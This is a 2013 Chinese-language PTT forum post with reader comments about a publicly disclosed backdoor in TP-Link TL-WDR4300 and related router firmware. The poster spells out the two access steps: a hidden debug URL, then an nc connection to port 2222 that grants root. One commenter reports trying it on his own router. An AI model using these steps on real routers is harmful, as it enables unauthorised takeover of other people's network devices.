作者Obb (有趣的世界)
看板Network
标题Fw: [情报] TP-Link 路由器发现後门
时间Sat Mar 16 14:39:19 2013
※ [本文转录自 Broad_Band 看板 #1HH1E3Fu ]
作者: Obb (有趣的世界) 看板: Broad_Band
标题: Re: [情报] TP-Link 路由器发现後门
时间: Sat Mar 16 14:38:57 2013
难怪美国的资讯采购坚持不用 华为设备
但我们三大电信采购买了很多... 真有种
後门进入方式
先
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
再nc 192.168.0.1 2222
获取TP-Link最高权限。
※ 引述《YuiFAN (半熟鱿鱼)》之铭言:
: http://www.solidot.org/story?sid=33846
: 安全研究员 Michal Sajdak 在深圳普联技术有限公司(TP-LINK)的路由器产品
: TL-WDR4300 的韧体中发现了後门漏洞,在通知普联无果後,公开了漏洞的概念
: 验证攻击代码。
: 受影响的型号包括 TL-WDR4300 和 TL-WR743ND (v1.2 / v2.0) 等,包含远程
: root 漏洞的韧体版本是去年底发布的最新版本 3.13.23 Build 122512
: (即2012年12月25日发布的版本)。Sajdak於 2月12日和22日两次向普联发去了
: 详细介绍漏洞的邮件,都没有得到任何回应,於是在3月12日公开了漏洞。
: 此漏洞的详细说明网页:
: http://sekurak.pl/tp-link-httptftp-backdoor/
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 182.18.223.9
※ 发信站: 批踢踢实业坊(ptt.cc)
※ 转录者: Obb (182.18.223.9), 时间: 03/16/2013 14:39:19
1F:推 deadwood:ㄧ切都是成本导向造成的XD 03/16 16:01
2F:→ akirakid:不用华为的我比较没种, 但是我也买了Tenda和TP_link... 03/16 16:41
3F:推 ids93216:不知道703n有没有...我拿到之後五分钟被我刷DD了 03/18 23:51
4F:推 Odyeuss:拿1043ND测试了一下有出现Art successfully started 03/22 12:01
5F:→ Odyeuss:请问这样是有问题的版本吗冏? 03/22 12:02
6F:→ Odyeuss:韧体版本3.13.4 Build 110930 Rel.36959n 03/22 12:02